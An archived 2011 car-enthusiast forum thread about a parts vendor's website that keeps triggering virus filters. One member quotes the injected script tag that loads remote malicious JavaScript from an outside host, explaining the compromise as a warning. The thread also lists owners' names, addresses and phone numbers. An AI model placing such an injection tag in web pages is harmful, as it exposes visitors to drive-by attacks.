Help - Search - Members - Calendar
Full Version: Anyone know the owner of QRS?
914World.com > The 914 Forums > 914World Garage
PeeGreen 914
I tried to go to the website of QRS fiberglass and I kept getting bumped out by my virus filter. Anyone know the owner to have them check to see if his page is okay? confused24.gif
SirAndy
QUOTE(PeeGreen 914 @ Mar 18 2011, 01:19 PM) *
I tried to go to the website of QRS fiberglass and I kept getting bumped out by my virus filter. Anyone know the owner to have them check to see if his page is okay? confused24.gif

Do a search here. It's been infected for years. There's at least 5 threads on the topic.

I sent the guy several emails over the years but it's still hijacked ...
dry.gif
r_towle
Kevin Wilson
539 E. Florida Ave.
Hemet, CA 92543
US
+1.9516581600

Call him.
sixnotfour
www.qrsfiberglass.com/catalog/index.p...

works for me ?
stugray
I get:

"Security risk blocked for your protection

Reason:

This Websense category is filtered: Malicious Web Sites. Sites in this category may pose a security threat to network resources or private information, and are blocked by your organization."

Stu
r_towle
QUOTE(stugray @ Mar 18 2011, 05:25 PM) *

I get:

"Security risk blocked for your protection

Reason:

This Websense category is filtered: Malicious Web Sites. Sites in this category may pose a security threat to network resources or private information, and are blocked by your organization."

Stu

That is a "black listed" site by your company.
Does not mean the site has a virus today...it may have at one point and never got white listed.

RIch
SirAndy
QUOTE(r_towle @ Mar 18 2011, 02:41 PM) *
Does not mean the site has a virus today...it may have at one point and never got white listed.

Oh, but it does. And has had for years, as i stated above ...

The injected hijack code is on line 239 of the source for the page "http://www.qrsfiberglass.com/catalog/":

CODE
<script type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></script>

The injected code above links to a offsite JavaScript page that attempts to attack anyone who looks at the QRS site ...

shades.gif
r_towle
how nice.
SirAndy
Description for "bcc.js":

"Malicious Javascript can either source in or directly execute code on a web page that can conduct drive-by-downloads, cause unwanted pop-ups or pop-unders, log keystrokes, steal browsing history, and so on."

popcorn[1].gif
PeeGreen 914
QUOTE(sixnotfour @ Mar 18 2011, 01:38 PM) *

works for me ?

You may want to clean your computer or at least have a scan run Jeff.

blink.gif
PeeGreen 914
QUOTE(r_towle @ Mar 18 2011, 01:35 PM) *

Kevin Wilson
539 E. Florida Ave.
Hemet, CA 92543
US
+1.9516581600

Call him.

Well that number's no good blink.gif
SirAndy
QUOTE(sixnotfour @ Mar 18 2011, 01:38 PM) *

works for me ?

Of course it works ... Nobody is trying to break that page. The hackers want the page to look normal and un-suspicious while they try to hack your computer ...

stirthepot.gif
moparrob
This is the correct info. I bought my bumper several months ago...

Jeffery Schmidt, 951-581-5537 41491 E. Florida Ave, Hemet, CA 92544

admin@qrsfiberglass.com

beerchug.gif
PeeGreen 914
beerchug.gif Thanks:)
sixnotfour
try this
http://www.qrsfiberglass.com/catalog/
Socalandy
I just called him to place an order the other day at the # on the website and he called me right back
Eric_Shea
works for me ?

That's because with all of the... "websites" you visit, your computer has developed calluses. tongue.gif
rick 918-S
Ya, his computer is callused and my ass is callused from sitting doing nothing but typing reports and estimates. dry.gif

I wonder how many sales he looses when people get that warning? idea.gif One of you saavy computer guys needs to help the brother out and fix that thing.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2024 Invision Power Services, Inc.